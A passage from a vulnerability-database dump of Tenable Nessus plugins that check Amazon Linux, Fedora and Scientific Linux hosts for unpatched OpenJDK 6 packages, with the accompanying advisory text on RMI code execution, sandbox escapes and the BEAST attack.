script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.6.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.6.0-openjdk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.6.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.6.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.6.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.6.0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/31\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"java-1.6.0-openjdk-1.6.0.0-52.1.9.10.40.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"java-1.6.0-openjdk-debuginfo-1.6.0.0-52.1.9.10.40.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"java-1.6.0-openjdk-demo-1.6.0.0-52.1.9.10.40.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"java-1.6.0-openjdk-devel-1.6.0.0-52.1.9.10.40.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"java-1.6.0-openjdk-javadoc-1.6.0.0-52.1.9.10.40.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"java-1.6.0-openjdk-src-1.6.0.0-52.1.9.10.40.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.6.0-openjdk / java-1.6.0-openjdk-debuginfo / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:44:44", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=745473", "https://bugzilla.redhat.com/show_bug.cgi?id=737506", "https://bugzilla.redhat.com/show_bug.cgi?id=745397", "https://bugzilla.redhat.com/show_bug.cgi?id=745399", "https://bugzilla.redhat.com/show_bug.cgi?id=745464", "http://www.nessus.org/u?245b2342", "https://bugzilla.redhat.com/show_bug.cgi?id=745442", "https://bugzilla.redhat.com/show_bug.cgi?id=745387", "https://bugzilla.redhat.com/show_bug.cgi?id=745447", "https://bugzilla.redhat.com/show_bug.cgi?id=745476", "https://bugzilla.redhat.com/show_bug.cgi?id=745379", "https://bugzilla.redhat.com/show_bug.cgi?id=745391", "https://bugzilla.redhat.com/show_bug.cgi?id=745459", "https://bugzilla.redhat.com/show_bug.cgi?id=745492"], "pluginID": "56719", "description": "Update to latest upstream bugfix release\n\n - Security fixes\n\n - S7000600, CVE-2011-3547: InputStream skip() information leak\n\n - S7019773, CVE-2011-3548: mutable static AWTKeyStroke.ctor\n\n - S7023640, CVE-2011-3551: Java2D TransformHelper integer overflow\n\n - S7032417, CVE-2011-3552: excessive default UDP socket limit under SecurityManager\n\n - S7046794, CVE-2011-3553: JAX-WS stack-traces information leak\n\n - S7046823, CVE-2011-3544: missing SecurityManager checks in scripting engine\n\n - S7055902, CVE-2011-3521: IIOP deserialization code execution\n\n - S7057857, CVE-2011-3554: insufficient pack200 JAR files uncompress error checks\n\n - S7064341, CVE-2011-3389: HTTPS: block-wise chosen-plaintext attack against SSL/TLS (BEAST)\n\n - S7070134, CVE-2011-3558: HotSpot crashes with sigsegv from PorterStemmer\n\n - S7077466, CVE-2011-3556: RMI DGC server remote code execution\n\n - S7083012, CVE-2011-3557: RMI registry privileged code execution\n\n - S7096936, CVE-2011-3560: missing checkSetFactory calls in HttpsURLConnection\n\n - Bug fixes\n\n - RH727195: Japanese font mappings are broken\n\n - Backports\n\n - S6826104, RH730015: Getting a NullPointer exception when clicked on Application & Toolkit Modal dialog\n\n - Zero/Shark\n\n - PR690: Shark fails to JIT using hs20.\n\n - PR696: Zero fails to handle fast_aldc and fast_aldc_w in hs20.\n\n - Added Patch6 as (probably temporally) solution for S7103224 for buildability on newest glibc libraries.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 5, "reporter": "Tenable", "published": "2011-11-07T00:00:00", "title": "Fedora 16 : java-1.6.0-openjdk-1.6.0.0-60.1.10.4.fc16 (2011-15020) (BEAST)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3557", "CVE-2011-3551", "CVE-2011-3548", "CVE-2011-3547", "CVE-2011-3521", "CVE-2011-3389", "CVE-2011-3544", "CVE-2011-3553", "CVE-2011-3558", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3560", "CVE-2011-3552"], "modified": "2017-06-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:java-1.6.0-openjdk", "cpe:/o:fedoraproject:fedora:16"], "id": "FEDORA_2011-15020.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=56719", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-15020.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(56719);\n script_version(\"$Revision: 1.22 $\");\n script_cvs_date(\"$Date: 2017/06/05 16:07:23 $\");\n\n script_cve_id(\"CVE-2011-3389\", \"CVE-2011-3521\", \"CVE-2011-3544\", \"CVE-2011-3547\", \"CVE-2011-3548\", \"CVE-2011-3551\", \"CVE-2011-3552\", \"CVE-2011-3553\", \"CVE-2011-3554\", \"CVE-2011-3556\", \"CVE-2011-3557\", \"CVE-2011-3558\", \"CVE-2011-3560\");\n script_bugtraq_id(49778, 50211, 50215, 50216, 50218, 50224, 50231, 50234, 50236, 50242, 50243, 50246, 50248);\n script_xref(name:\"FEDORA\", value:\"2011-15020\");\n\n script_name(english:\"Fedora 16 : java-1.6.0-openjdk-1.6.0.0-60.1.10.4.fc16 (2011-15020) (BEAST)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to latest upstream bugfix release\n\n - Security fixes\n\n - S7000600, CVE-2011-3547: InputStream skip()\n information leak\n\n - S7019773, CVE-2011-3548: mutable static\n AWTKeyStroke.ctor\n\n - S7023640, CVE-2011-3551: Java2D TransformHelper\n integer overflow\n\n - S7032417, CVE-2011-3552: excessive default UDP socket\n limit under SecurityManager\n\n - S7046794, CVE-2011-3553: JAX-WS stack-traces\n information leak\n\n - S7046823, CVE-2011-3544: missing SecurityManager\n checks in scripting engine\n\n - S7055902, CVE-2011-3521: IIOP deserialization code\n execution\n\n - S7057857, CVE-2011-3554: insufficient pack200 JAR\n files uncompress error checks\n\n - S7064341, CVE-2011-3389: HTTPS: block-wise\n chosen-plaintext attack against SSL/TLS (BEAST)\n\n - S7070134, CVE-2011-3558: HotSpot crashes with sigsegv\n from PorterStemmer\n\n - S7077466, CVE-2011-3556: RMI DGC server remote code\n execution\n\n - S7083012, CVE-2011-3557: RMI registry privileged code\n execution\n\n - S7096936, CVE-2011-3560: missing checkSetFactory calls\n in HttpsURLConnection\n\n - Bug fixes\n\n - RH727195: Japanese font mappings are broken\n\n - Backports\n\n - S6826104, RH730015: Getting a NullPointer exception\n when clicked on Application & Toolkit Modal dialog\n\n - Zero/Shark\n\n - PR690: Shark fails to JIT using hs20.\n\n - PR696: Zero fails to handle fast_aldc and fast_aldc_w\n in hs20.\n\n - Added Patch6 as (probably temporally) solution for\n S7103224 for buildability on newest glibc libraries.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=737506\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=745379\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=745387\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=745391\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=745397\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=745399\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=745442\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=745447\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=745459\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=745464\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=745473\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=745476\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=745492\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-November/068806.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?245b2342\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1.6.0-openjdk package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java RMI Server Insecure Default Configuration Java Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:java-1.6.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2017 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"java-1.6.0-openjdk-1.6.0.0-60.1.10.4.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.6.0-openjdk\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:55:00", "references": ["http://www.nessus.org/u?00e3926b"], "pluginID": "61156", "description": "These packages provide the OpenJDK 6 Java Runtime Environment and the OpenJDK 6 Software Development Kit.\n\nA flaw was found in the Java RMI (Remote Method Invocation) registry implementation. A remote RMI client could use this flaw to execute arbitrary code on the RMI server running the registry. (CVE-2011-3556)\n\nA flaw was found in the Java RMI registry implementation. A remote RMI client could use this flaw to execute code on the RMI server with unrestricted privileges. (CVE-2011-3557)\n\nA flaw was found in the IIOP (Internet Inter-Orb Protocol) deserialization code. An untrusted Java application or applet running in a sandbox could use this flaw to bypass sandbox restrictions by deserializing specially crafted input. (CVE-2011-3521)\n\nIt was found that the Java ScriptingEngine did not properly restrict the privileges of sandboxed applications. An untrusted Java application or applet running in a sandbox could use this flaw to bypass sandbox restrictions. (CVE-2011-3544)\n\nA flaw was found in the AWTKeyStroke implementation. An untrusted Java application or applet running in a sandbox could use this flaw to bypass sandbox restrictions. (CVE-2011-3548)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the Java2D code used to perform transformations of graphic shapes and images. An untrusted Java application or applet running in a sandbox could use this flaw to bypass sandbox restrictions.\n(CVE-2011-3551)\n\nAn insufficient error checking flaw was found in the unpacker for JAR files in pack200 format. A specially crafted JAR file could use this flaw to crash the Java Virtual Machine (JVM) or, possibly, execute arbitrary code with JVM privileges. (CVE-2011-3554)\n\nIt was found that HttpsURLConnection did not perform SecurityManager checks in the setSSLSocketFactory method. An untrusted Java application or applet running in a sandbox could use this flaw to bypass connection restrictions defined in the policy. (CVE-2011-3560)\n\nA flaw was found in the way the SSL 3 and TLS 1.0 protocols used block ciphers in cipher-block chaining (CBC) mode. An attacker able to perform a chosen plain text attack against a connection mixing trusted and untrusted data could use this flaw to recover portions of the trusted data sent over the connection. (CVE-2011-3389)\n\nNote: This update mitigates the CVE-2011-3389 issue by splitting the first application data record byte to a separate SSL/TLS protocol record. This mitigation may cause compatibility issues with some SSL/TLS implementations and can be disabled using the jsse.enableCBCProtection boolean property. This can be done on the command line by appending the flag '-Djsse.enableCBCProtection=false' to the java command.\n\nAn information leak flaw was found in the InputStream.skip implementation. An untrusted Java application or applet could possibly use this flaw to obtain bytes skipped by other threads.\n(CVE-2011-3547)\n\nA flaw was found in the Java HotSpot virtual machine. An untrusted Java application or applet could use this flaw to disclose portions of the VM memory, or cause it to crash. (CVE-2011-3558)\n\nThe Java API for XML Web Services (JAX-WS) implementation in OpenJDK was configured to include the stack trace in error messages sent to clients. A remote client could possibly use this flaw to obtain sensitive information. (CVE-2011-3553)\n\nIt was found that Java applications running with SecurityManager restrictions were allowed to use too many UDP sockets by default. If multiple instances of a malicious application were started at the same time, they could exhaust all available UDP sockets on the system.\n(CVE-2011-3552)\n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.9.10.\nRefer to the NEWS file, linked to in the References, for further information.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these updated packages, which resolve these issues. All running instances of OpenJDK Java must be restarted for the update to take effect.", "edition": 5, "reporter": "Tenable", "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : java-1.6.0-openjdk on SL5.x, SL6.x i386/x86_64 (BEAST)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "naslFamily": "Scientific Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3557", "CVE-2011-3551", "CVE-2011-3548", "CVE-2011-3547", "CVE-2011-3521", "CVE-2011-3389", "CVE-2011-3544", "CVE-2011-3553", "CVE-2011-3558", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3560", "CVE-2011-3552"], "modified": "2017-06-05T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20111018_JAVA_1_6_0_OPENJDK_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=61156", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(61156);\n script_version(\"$Revision: 1.7 $\");\n script_cvs_date(\"$Date: 2017/06/05 16:07:23 $\");\n\n script_cve_id(\"CVE-2011-3389\", \"CVE-2011-3521\", \"CVE-2011-3544\", \"CVE-2011-3547\", \"CVE-2011-3548\", \"CVE-2011-3551\", \"CVE-2011-3552\", \"CVE-2011-3553\", \"CVE-2011-3554\", \"CVE-2011-3556\", \"CVE-2011-3557\", \"CVE-2011-3558\", \"CVE-2011-3560\");\n\n script_name(english:\"Scientific Linux Security Update : java-1.6.0-openjdk on SL5.x, SL6.x i386/x86_64 (BEAST)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"These packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit.\n\nA flaw was found in the Java RMI (Remote Method Invocation) registry\nimplementation. A remote RMI client could use this flaw to execute\narbitrary code on the RMI server running the registry. (CVE-2011-3556)\n\nA flaw was found in the Java RMI registry implementation. A remote RMI\nclient could use this flaw to execute code on the RMI server with\nunrestricted privileges. (CVE-2011-3557)\n\nA flaw was found in the IIOP (Internet Inter-Orb Protocol)\ndeserialization code. An untrusted Java application or applet running\nin a sandbox could use this flaw to bypass sandbox restrictions by\ndeserializing specially crafted input. (CVE-2011-3521)\n\nIt was found that the Java ScriptingEngine did not properly restrict\nthe privileges of sandboxed applications. An untrusted Java\napplication or applet running in a sandbox could use this flaw to\nbypass sandbox restrictions. (CVE-2011-3544)\n\nA flaw was found in the AWTKeyStroke implementation. An untrusted Java\napplication or applet running in a sandbox could use this flaw to\nbypass sandbox restrictions. (CVE-2011-3548)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the Java2D code used to perform transformations of graphic\nshapes and images. An untrusted Java application or applet running in\na sandbox could use this flaw to bypass sandbox restrictions.\n(CVE-2011-3551)\n\nAn insufficient error checking flaw was found in the unpacker for JAR\nfiles in pack200 format. A specially crafted JAR file could use this\nflaw to crash the Java Virtual Machine (JVM) or, possibly, execute\narbitrary code with JVM privileges. (CVE-2011-3554)\n\nIt was found that HttpsURLConnection did not perform SecurityManager\nchecks in the setSSLSocketFactory method. An untrusted Java\napplication or applet running in a sandbox could use this flaw to\nbypass connection restrictions defined in the policy. (CVE-2011-3560)\n\nA flaw was found in the way the SSL 3 and TLS 1.0 protocols used block\nciphers in cipher-block chaining (CBC) mode. An attacker able to\nperform a chosen plain text attack against a connection mixing trusted\nand untrusted data could use this flaw to recover portions of the\ntrusted data sent over the connection. (CVE-2011-3389)\n\nNote: This update mitigates the CVE-2011-3389 issue by splitting the\nfirst application data record byte to a separate SSL/TLS protocol\nrecord. This mitigation may cause compatibility issues with some\nSSL/TLS implementations and can be disabled using the\njsse.enableCBCProtection boolean property. This can be done on the\ncommand line by appending the flag '-Djsse.enableCBCProtection=false'\nto the java command.\n\nAn information leak flaw was found in the InputStream.skip\nimplementation. An untrusted Java application or applet could possibly\nuse this flaw to obtain bytes skipped by other threads.\n(CVE-2011-3547)\n\nA flaw was found in the Java HotSpot virtual machine. An untrusted\nJava application or applet could use this flaw to disclose portions of\nthe VM memory, or cause it to crash. (CVE-2011-3558)\n\nThe Java API for XML Web Services (JAX-WS) implementation in OpenJDK\nwas configured to include the stack trace in error messages sent to\nclients. A remote client could possibly use this flaw to obtain\nsensitive information. (CVE-2011-3553)\n\nIt was found that Java applications running with SecurityManager\nrestrictions were allowed to use too many UDP sockets by default. If\nmultiple instances of a malicious application were started at the same\ntime, they could exhaust all available UDP sockets on the system.\n(CVE-2011-3552)\n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.9.10.\nRefer to the NEWS file, linked to in the References, for further\ninformation.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these\nupdated packages, which resolve these issues. All running instances of\nOpenJDK Java must be restarted for the update to take effect.\"\n );\n # http://listserv.fnal.gov/scripts/wa.exe?A2=ind1110&L=scientific-linux-errata&T=0&P=1851\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?00e3926b\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java RMI Server Insecure Default Configuration Java Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/18\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2017 Tenable Network Security, Inc.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"java-1.6.0-openjdk-1.6.0.0-1.23.1.9.10.el5_7\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"java-1.6.0-openjdk-debuginfo-1.6.0.0-1.23.1.9.10.el5_7\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"java-1.6.0-openjdk-demo-1.6.0.0-1.23.1.9.10.el5_7\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"java-1.6.0-openjdk-devel-1.6.0.0-1.23.1.9.10.el5_7\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"java-1.6.0-openjdk-javadoc-1.6.0.0-1.23.1.9.10.el5_7\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"java-1.6.0-openjdk-src-1.6.0.0-1.23.1.9.10.el5_7\")) flag++;\n\nif (rpm_check(release:\"SL6\", reference:\"java-1.6.0-openjdk-1.6.0.0-1.40.1.9.10.el6_1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"java-1.6.0-openjdk-debuginfo-1.6.0.0-1.40.1.9.10.el6_1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"java-1.6.0-openjdk-demo-1.6.0.0-1.40.1.9.10.el6_1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"java-1.6.0-openjdk-devel-1.6.0.0-1.40.1.9.10.el6_1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"java-1.6.0-openjdk-javadoc-1.6.0.0-1.40.1.9.10.el6_1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"java-1.6.0-openjdk-src-1.6.0.0-1.40.1.9.10.el6_1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-11T13:07:30", "references": ["http://www.nessus.org/u?9700d25e", "http://www.nessus.org/u?5016922f"], "pluginID": "56558", "description": "Updated java-1.6.0-openjdk packages that fix several security issues are now available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 6 Java Runtime Environment and the OpenJDK 6 Software Development Kit.\n\nA flaw was found in the Java RMI (Remote Method Invocation) registry implementation. A remote RMI client could use this flaw to execute arbitrary code on the RMI server running the registry. (CVE-2011-3556)\n\nA flaw was found in the Java RMI registry implementation. A remote RMI client could use this flaw to execute code on the RMI server with unrestricted privileges. (CVE-2011-3557)\n\nA flaw was found in the IIOP (Internet Inter-Orb Protocol) deserialization code. An untrusted Java application or applet running in a sandbox could use this flaw to bypass sandbox restrictions by deserializing specially crafted input. (CVE-2011-3521)\n\nIt was found that the Java ScriptingEngine did not properly restrict the privileges of sandboxed applications. An untrusted Java application or applet running in a sandbox could use this flaw to bypass sandbox restrictions. (CVE-2011-3544)\n\nA flaw was found in the AWTKeyStroke implementation. An untrusted Java application or applet running in a sandbox could use this flaw to bypass sandbox restrictions. (CVE-2011-3548)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the Java2D code used to perform transformations of graphic shapes and images. An untrusted Java application or applet running in a sandbox could use this flaw to bypass sandbox restrictions.\n(CVE-2011-3551)\n\nAn insufficient error checking flaw was found in the unpacker for JAR files in pack200 format. A specially crafted JAR file could use this flaw to crash the Java Virtual Machine (JVM) or, possibly, execute arbitrary code with JVM privileges. (CVE-2011-3554)\n\nIt was found that HttpsURLConnection did not perform SecurityManager checks in the setSSLSocketFactory method. An untrusted Java application or applet running in a sandbox could use this flaw to bypass connection restrictions defined in the policy. (CVE-2011-3560)\n\nA flaw was found in the way the SSL 3 and TLS 1.0 protocols used block ciphers in cipher-block chaining (CBC) mode. An attacker able to perform a chosen plain text attack against a connection mixing trusted and untrusted data could use this flaw to recover portions of the 